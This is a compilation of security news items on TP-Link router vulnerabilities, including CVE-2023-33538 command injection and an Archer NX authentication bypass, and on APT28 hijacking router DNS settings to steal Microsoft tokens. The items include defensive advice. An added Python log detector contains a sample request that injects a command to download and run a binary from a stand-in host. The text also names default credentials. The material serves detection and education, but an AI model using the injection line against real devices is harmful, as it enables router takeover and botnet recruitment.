  • ✇Security Affairs

CVE-2023-33538 under attack for a year, but exploitation still unsuccessful

20 April 2026, 10:44

Hackers have targeted CVE-2023-33538 flaw in old TP-Link routers for a year, but no successful exploitation has been seen so far.

Hackers have been trying for over a year to exploit a serious flaw, tracked as CVE-2023-33538 (CVSS score of 8.8), in outdated TP-Link routers, but so far without success.

The vulnerability is a command injection vulnerability in the /userRpm/WlanNetworkRpm component that impacts several TP-Link router models (TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10).

CISA added the issue to the KEV catalog in June 2025 and ordered federal agencies to fix the vulnerability by July 7, 2025.

CVE-2023-33538, disclosed in June 2023, lies in the /userRpm/WlanNetworkRpm endpoint, where the ssid1 parameter is not properly sanitized. Attackers can exploit this via crafted HTTP requests to inject commands and potentially execute arbitrary code on the device. Proof-of-concept exploits were briefly shared online and remain accessible through web archives.

“Our telemetry systems detected active, large-scale exploitation attempts for CVE-2023-33538 around the time of the addition to the KEV catalog in June 2025.” reads the advisory published by Palo Alto Networks. “We observed multiple exploitation attempts.”

The researchers observed attackers sending HTTP GET requests to the /userRpm/WlanNetworkRpm.htm endpoint, trying to abuse the ssid parameter to run multiple commands. They first downloaded a malicious ELF binary named arm7 from a remote server into /tmp, then changed its permissions to make it executable, and finally ran it with a specific argument.

The activity resembles botnet behavior, often linked to Mirai-like malware. The requests also used Basic Authentication with the default credentials admin:admin, encoded in Base64.

“The arm7 binary found in our telemetry appears to be a Mirai variant. It is similar to the one used in the Condi IoT botnet, with multiple examples of the string condi in the file’s code.” continues the report.

The arm7 bot binary connects to its C2 server and listens for commands sent through a network socket. It stores incoming data in a buffer and checks it for specific byte patterns that act as instructions.

Each pattern triggers a different action. The malware can reply with a status message, start or stop operations, activate a lockdown mode, or launch an embedded HTTP server. It can also download updated malware versions depending on the command received.

When an update is triggered, the binary calls an internal update function that removes old files, contacts a hard-coded C2 server (51.38.137[.]113), and downloads fresh binaries for multiple CPU architectures. The malware cycles through several variants to stay compatible with different devices.

The C2 infrastructure is tied to a known malicious host also linked to Mirai-like botnet activity.

If instructed, the malware turns the infected device into a web server. It randomly selects a port, starts an HTTP service, and listens for connections. In this mode, it can distribute malware binaries to other infected devices, helping the botnet spread.

Overall, arm7 acts both as a command-driven bot and a distribution node, constantly updating itself and helping propagate the malware across new systems.

Palo Alto Networks published a detailed analysis of the exploit for CVE-2023-33538 on a TP-Link router to better understand the reason for the failure.

The vulnerability sits in the router’s web interface, specifically in how it handles the ssid1 parameter from the /userRpm/WlanNetworkRpm.htm endpoint. When the system processes this input, it does not clean or validate it properly. That mistake allows an attacker to inject system commands that later get passed to a shell and executed.

The execution flow is long but simple in idea. The router takes the HTTP request, extracts the SSID value, stores it in configuration structures, and compares it with previous settings. When it detects changes, it builds a system command like iwconfig and inserts the SSID value directly into it. The system then runs this command through a shell, which opens the door for code execution.
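As an added illustration (not TP-Link's firmware code, which is C; this is a Python sketch of the same pattern), here is the unsafe string-splicing form described above beside a hardened form that validates the SSID and passes it as a single argv element. The interface name ath0 is an assumption, and the hostile SSID value is constructed.

```python
import shlex

IFACE = "ath0"  # assumed wireless interface name; the report does not name it


def build_command_unsafe(ssid):
    """The pattern the report describes: the SSID is spliced into a shell
    command string. Returned as a string only; this example never hands it
    to a shell."""
    return f"iwconfig {IFACE} essid {ssid}"


def shell_words(cmd):
    """Tokenise a command string the way a POSIX shell would (shlex with
    punctuation_chars), so a command separator shows up as its own word."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


def validate_ssid(ssid):
    """Allow-list check: 1 to 32 bytes of UTF-8 (the 802.11 SSID limit),
    printable, and none of the characters a shell would interpret."""
    encoded = ssid.encode("utf-8")
    if not 1 <= len(encoded) <= 32 or not ssid.isprintable():
        return False
    return not (set(ssid) & set(";|&`$()<>\"'\\"))


def build_command_safe(ssid):
    """Hardened form: validate first, then keep the SSID as one argv element.
    Running this list with subprocess.run(argv) involves no shell, so a
    metacharacter that slipped through would still be just part of the name."""
    if not validate_ssid(ssid):
        raise ValueError("rejected SSID: %r" % ssid)
    return ["iwconfig", IFACE, "essid", ssid]


if __name__ == "__main__":
    hostile = "home; echo injected"  # constructed value with a command separator
    print(shell_words(build_command_unsafe(hostile)))  # ';' becomes its own token
    print(build_command_safe("My Home WiFi"))
    try:
        build_command_safe(hostile)
    except ValueError as exc:
        print(exc)
```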

The experts reproduced the issue by emulating the firmware and logging into the router’s admin panel. They also found that the device requires authentication, so attackers cannot exploit it without valid credentials. The system uses default or weak login setups in many cases, which increases the risk.

Palo Alto Networks also saw important limitations in the environment. The router runs a restricted BusyBox shell with very few tools, so attackers cannot easily download or run advanced utilities. This limits the impact of the exploit in practice.

In summary, the vulnerability is real and allows command injection through ssid1, but successful attacks depend on authentication and the very limited system environment.

“Neither the public PoC for CVE-2023-33538 nor the attack attempts observed in our telemetry would successfully compromise the TP-Link router environment we analyzed. However, our deep dive into the firmware and its emulation reveals a significant gap between the theoretical vulnerability and its practical, real-world application.” concludes the report.

“The attacks seen in the wild were flawed on multiple levels:

  • They were unauthenticated
  • They targeted the incorrect parameter (ssid instead of ssid1)
  • They relied on the wget utility, which is not present in the firmware’s limited BusyBox environment

This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks.”
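An added detection example, not part of Palo Alto Networks' report: a small Python checker that runs over constructed web-server log lines (the log format, client addresses and URLs are made up for the example) and flags the indicators described above for requests to the WlanNetworkRpm endpoint, including the three flaws the report lists (default or missing credentials, ssid instead of ssid1, reliance on wget).

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log format for this example (not a real TP-Link or proxy log):
#   <client> <method> "<request-target>" <status> "<Authorization header or ->"
LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>[A-Z]+) "(?P<target>[^"]*)" '
    r'(?P<status>\d{3}) "(?P<auth>[^"]*)"$'
)

VULN_ENDPOINT = "/userRpm/WlanNetworkRpm"  # prefix match also covers the .htm form
SHELL_META = set(";|&`$()\n")

# Constructed sample lines (TEST-NET addresses). The first mimics the observed
# attempts: ssid parameter, download to /tmp with wget, Basic admin:admin.
SAMPLE_LOG = """\
198.51.100.23 GET "/userRpm/WlanNetworkRpm.htm?ssid=home%3Bcd+/tmp%3Bwget+http://192.0.2.10/arm7%3Bchmod+777+arm7%3B./arm7" 401 "Basic YWRtaW46YWRtaW4="
203.0.113.5 GET "/userRpm/WlanNetworkRpm.htm?ssid1=GuestNet&region=0" 200 "Basic dXNlcjpzM2NyM3Q="
203.0.113.9 GET "/userRpm/StatusRpm.htm" 200 "-"
"""


def decode_basic(auth):
    """Return 'user:password' from a Basic header value, or None if absent/malformed."""
    if not auth.lower().startswith("basic "):
        return None
    try:
        return base64.b64decode(auth[6:].strip(), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def analyze(line):
    """Classify one log line; returns None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    record = {"client": m["client"], "attempt": False, "findings": []}
    if not parts.path.startswith(VULN_ENDPOINT):
        return record
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in ("ssid", "ssid1"):
        for value in params.get(name, []):
            if SHELL_META & set(value):
                record["attempt"] = True
                record["findings"].append(f"shell metacharacters in {name}")
            if "wget" in value:
                record["findings"].append("relies on wget, absent from this firmware's BusyBox")
            if "/tmp" in value:
                record["findings"].append("stages a payload under /tmp")
    if "ssid" in params and "ssid1" not in params:
        record["findings"].append("uses ssid; the vulnerable parameter is ssid1")
    creds = decode_basic(m["auth"])
    if m["auth"] == "-":
        record["findings"].append("no credentials supplied")
    elif creds == "admin:admin":
        record["findings"].append("default credentials admin:admin")
    return record


def scan(log_text):
    """Return records for every line that hit the endpoint with something worth noting."""
    hits = []
    for line in log_text.splitlines():
        rec = analyze(line)
        if rec and (rec["attempt"] or rec["findings"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        label = "EXPLOIT ATTEMPT" if rec["attempt"] else "probe"
        print(rec["client"], label, "; ".join(rec["findings"]))
```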

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, TP-Link)

  • ✇Malwarebytes

Russian hacking group targets home and small office routers to spy on users

8 April 2026, 10:31

British security officials found that a group linked to the Russian military is spying on users of compromised Small Office/Home Office (SOHO) routers in a broad cyber espionage campaign. A Microsoft blog goes into the technical details of these attacks.

The group, which we’ll refer to as APT28, but is also known under names like Fancy Bear, BlueDelta, and Forest Blizzard, changes the DNS settings of compromised routers so their traffic is sent through servers under their control, which enables APT28 to spy on users.

The domain name system (DNS) is the way that internet domain names are located and translated into Internet Protocol (IP) addresses. Devices usually get network settings from routers using Dynamic Host Configuration Protocol (DHCP).

If an attacker can tamper with the router’s DNS settings, they can silently steer traffic through infrastructure they control, harvest login details, and in some cases position themselves between the user and the real service. This is why the campaign can support credential theft and even targeted interception of Microsoft 365 and other cloud traffic.

An FBI public service announcement says that APT28:

“…has harvested passwords, authentication tokens, and sensitive information including emails and web browsing information normally protected by secure socket layer (SSL) and transport layer security (TLS) encryption.”

The FBI says the group cast a wide net over the US and globally, before narrowing down its victims to those with access to information related to military, government, and critical infrastructure.

The NCSC advisory singles out a single model of TP-Link (WR841N) with a known vulnerability that enables an unauthenticated attacker to obtain information such as usernames and passwords via specially crafted HTTP GET requests. This router model is widely sold to consumers and small businesses and not typically used as standard equipment by major internet service providers. The article also includes a long but not exhaustive list of other TP-Link router models targeted by APT28.

Microsoft Threat Intelligence says it has identified over 200 organizations and 5,000 consumer devices impacted by Forest Blizzard’s malicious DNS infrastructure.

The router ban debate

A few weeks ago, we commented on the FCC’s decision to effectively stop foreign-made routers from being imported unless their manufacturers obtain an exemption, due to what the FCC called an “unacceptable risk to the national security of the United States or the safety and security of United States persons.”

APT28’s actions show the kind of risk the FCC is trying to stop, but they also reinforce our point: while the debate over router bans and supply-chain restrictions often focuses on national origin, the bigger issue is whether the devices are secure in practice. If a router ships with weak defaults, poor update support, or a confusing setup process, it becomes a target regardless of where it was made. Attackers do not need perfection. They only need enough exposed devices to build a large, quiet infrastructure for spying and redirection.

What you can do

To check whether your settings are OK, we can only give general directions since they are sometimes very device-specific. But this method usually works:

How to check that your router’s DHCP settings match what your ISP intends:

  1. Check your current DHCP information on a device.
    On a PC or phone connected to your home network, open the network details and note the IP address, subnet mask, default gateway, and DNS servers your device is using.
  2. Log in to your router and find its WAN/Internet settings.
    In the router’s web interface, look at the “Status” or “Internet” page to see what address it has received from the ISP, and which DNS servers it is configured to use.
  3. Compare against what your ISP documents or tells you.
    Check your ISP’s support pages or contact support to confirm what they expect: whether your connection should use DHCP or PPPoE, what range your public IP should come from, and which DNS servers they normally provide. Large mismatches (for example, DNS servers in a different country or from an unknown organization) are a reason to investigate further.
  4. If you use custom DNS, document it.
    If you deliberately use alternative DNS (for example, a privacy or security resolver), write that down and periodically re‑check that your router and clients are still using the addresses you chose.

Other measures

If you can afford it and haven’t already, upgrade to Wi-Fi 7 to help future-proof your setup while current models are still in stores.

You should at least:

  • Change your router’s default usernames and passwords to something less easy to guess.
  • Check the vendor’s website for updates, confirm the end-of-life (EOL) date, and update to the latest firmware version.
  • Disable remote management interfaces from the Internet where possible.
  • All users should carefully consider certificate warnings in web browsers and email clients because they indicate something is wrong with the secure connection and could mean you are not talking to the genuine site.

For technically confident users, replacing vendor firmware with open-source alternatives like OpenWrt or DD-WRT can extend a router’s secure lifespan. But this comes with risks, including voiding warranties or potentially bricking your device. You should only do this, or have it done, if you’re comfortable troubleshooting.

If a US citizen suspects they have been targeted or compromised by a Russian cyberintrusion, they are asked to report the activity to their local FBI field office or file a complaint with the IC3. Be sure to provide details about the affected router, including device type and DHCP configurations.


  • ✇Cybersecurity News
  • APT28 Hijacks Home Routers to Steal Corporate Credentials Ddos
  • ✇Krebs on Security
  • Russia Hacked Routers to Steal Microsoft Office Tokens BrianKrebs

Russia Hacked Routers to Steal Microsoft Office Tokens

7 April 2026, 14:02

Hackers linked to Russia’s military intelligence units are using known flaws in older Internet routers to mass harvest authentication tokens from Microsoft Office users, security experts warned today. The spying campaign allowed state-backed Russian hackers to quietly siphon authentication tokens from users on more than 18,000 networks without deploying any malicious software or code.

Microsoft said in a blog post today it identified more than 200 organizations and 5,000 consumer devices that were caught up in a stealthy but remarkably simple spying network built by a Russia-backed threat actor known as “Forest Blizzard.”

How targeted DNS requests were redirected at the router. Image: Black Lotus Labs.

Also known as APT28 and Fancy Bear, Forest Blizzard is attributed to the military intelligence units within Russia’s General Staff Main Intelligence Directorate (GRU). APT28 famously compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.

Researchers at Black Lotus Labs, a security division of the Internet backbone provider Lumen, found that at the peak of its activity in December 2025, Forest Blizzard’s surveillance dragnet ensnared more than 18,000 Internet routers that were mostly unsupported, end-of-life routers, or else far behind on security updates. A new report from Lumen says the hackers primarily targeted government agencies—including ministries of foreign affairs, law enforcement, and third-party email providers.

Black Lotus Security Engineer Ryan English said the GRU hackers did not need to install malware on the targeted routers, which were mainly older Mikrotik and TP-Link devices marketed to the Small Office/Home Office (SOHO) market. Instead, they used known vulnerabilities to modify the Domain Name System (DNS) settings of the routers to include DNS servers controlled by the hackers.

As the U.K.’s National Cyber Security Centre (NCSC) notes in a new advisory detailing how Russian cyber actors have been compromising routers, DNS is what allows individuals to reach websites by typing familiar addresses, instead of associated IP addresses. In a DNS hijacking attack, bad actors interfere with this process to covertly send users to malicious websites designed to steal login details or other sensitive information.

English said the routers attacked by Forest Blizzard were reconfigured to use DNS servers that pointed to a handful of virtual private servers controlled by the attackers. Importantly, the attackers could then propagate their malicious DNS settings to all users on the local network, and from that point forward intercept any OAuth authentication tokens transmitted by those users.

DNS hijacking through router compromise. Image: Microsoft.

Because those tokens are typically transmitted only after the user has successfully logged in and gone through multi-factor authentication, the attackers could gain direct access to victim accounts without ever having to phish each user’s credentials and/or one-time codes.

“Everyone is looking for some sophisticated malware to drop something on your mobile devices or something,” English said. “These guys didn’t use malware. They did this in an old-school, graybeard way that isn’t really sexy but it gets the job done.”

Microsoft refers to the Forest Blizzard activity as using DNS hijacking “to support post-compromise adversary-in-the-middle (AiTM) attacks on Transport Layer Security (TLS) connections against Microsoft Outlook on the web domains.” The software giant said while targeting SOHO devices isn’t a new tactic, this is the first time Microsoft has seen Forest Blizzard using “DNS hijacking at scale to support AiTM of TLS connections after exploiting edge devices.”

Black Lotus Labs engineer Danny Adamitis said it will be interesting to see how Forest Blizzard reacts to today’s flurry of attention to their espionage operation, noting that the group immediately switched up its tactics in response to a similar NCSC report (PDF) in August 2025. At the time, Forest Blizzard was using malware to control a far more targeted and smaller group of compromised routers. But Adamitis said the day after the NCSC report, the group quickly ditched the malware approach in favor of mass-altering the DNS settings on thousands of vulnerable routers.

“Before the last NCSC report came out they used this capability in very limited instances,” Adamitis told KrebsOnSecurity. “After the report was released they implemented the capability in a more systemic fashion and used it to target everything that was vulnerable.”

TP-Link was among the router makers facing a complete ban in the United States. But on March 23, the U.S. Federal Communications Commission (FCC) took a much broader approach, announcing it would no longer certify consumer-grade Internet routers that are produced outside of the United States.

The FCC warned that foreign-made routers had become an untenable national security threat, and that poorly-secured routers present “a severe cybersecurity risk that could be leveraged to immediately and severely disrupt U.S. critical infrastructure and directly harm U.S. persons.”

Experts have countered that few new consumer-grade routers would be available for purchase under this new FCC policy (besides maybe Musk’s Starlink satellite Internet routers, which are produced in Texas). The FCC says router makers can apply for a special “conditional approval” from the Department of War or Department of Homeland Security, and that the new policy does not affect any previously-purchased consumer-grade routers.

  • ✇Security Affairs
  • Patch now: TP-Link Archer NX routers vulnerable to firmware takeover Pierluigi Paganini

Patch now: TP-Link Archer NX routers vulnerable to firmware takeover

25 March 2026, 11:44

TP-Link patched a high severity flaw (CVE-2025-15517) in Archer NX routers that could let attackers bypass authentication and install malicious firmware.

TP-Link issued security updates for its Archer NX router series to fix multiple vulnerabilities, including CVE-2025-15517 (CVSS score of 8.6), a critical authentication bypass flaw. The vulnerability impacts multiple models, including NX200, NX210, NX500, and NX600. The flaw allows attackers to upload new firmware without privileges, creating a high risk of compromise if unpatched.

“A missing authentication check in the HTTP server to certain cgi endpoints allows unauthenticated access intended for authenticated users.” reads the advisory. “An attacker may perform privileged HTTP actions without authentication, including firmware upload and configuration operations.”

TP-Link also removed a hardcoded cryptographic key from the routers’ configuration encryption mechanism, tracked as CVE-2025-15605 (CVSS score of 8.5). The vulnerability allowed authenticated attackers to decrypt configuration files, modify them, and re-encrypt them.

“A hardcoded cryptographic key within its configuration mechanism enables decryption and re-encryption of device configuration data.” reads the advisory. “An authenticated attacker may decrypt configuration files, modify them and re-encrypt them, affecting confidentiality and integrity of device configuration data.”

Below is the list of impacted products/versions and related fixes:

Affected product and hardware version: affected firmware versions (fixed in the listed build)

Archer NX600
  • v3.0: < 1.3.0 Build 260309
  • v2.0: < 1.3.0 Build 260311
  • v1.0: < 1.4.0 Build 260311
Archer NX500
  • v2.0: < 1.5.0 Build 260309
  • v1.0: < 1.3.0 Build 260311
Archer NX210
  • v3.0: < 1.3.0 Build 260309
  • v2.0 & v2.20: < 1.3.0 Build 260311
Archer NX200
  • v3.0: < 1.3.0 Build 260309
  • v2.20: < 1.3.0 Build 260311
  • v2.0: < 1.3.0 Build 260311
  • v1.0: < 1.8.0 Build 260311

The vendor urges customers to download and install the latest firmware version to address these issues.

In September 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added TP-Link Archer C7(EU) and TL-WR841N flaws to its Known Exploited Vulnerabilities (KEV) catalog.

Below are the descriptions for these flaws:

  • CVE-2025-9377 (CVSS score of 8.6) TP-Link Archer C7(EU) and TL-WR841N/ND(MS) OS Command Injection Vulnerability
  • CVE-2023-50224 (CVSS score of 6.5) TP-Link TL-WR841N Authentication Bypass by Spoofing Vulnerability

This week, the U.S. FCC announced a ban on importing new foreign-made consumer routers, citing unacceptable cyber and national security risks. The decision, backed by Executive Branch assessments, means such devices can no longer be sold or marketed in the U.S. unless they receive special approval.

Routers will be added to the Covered List, with exceptions only for devices that the Department of Homeland Security or defense authorities have verified pose no threat to communications networks.


Pierluigi Paganini

(SecurityAffairs – hacking, Archer NX)
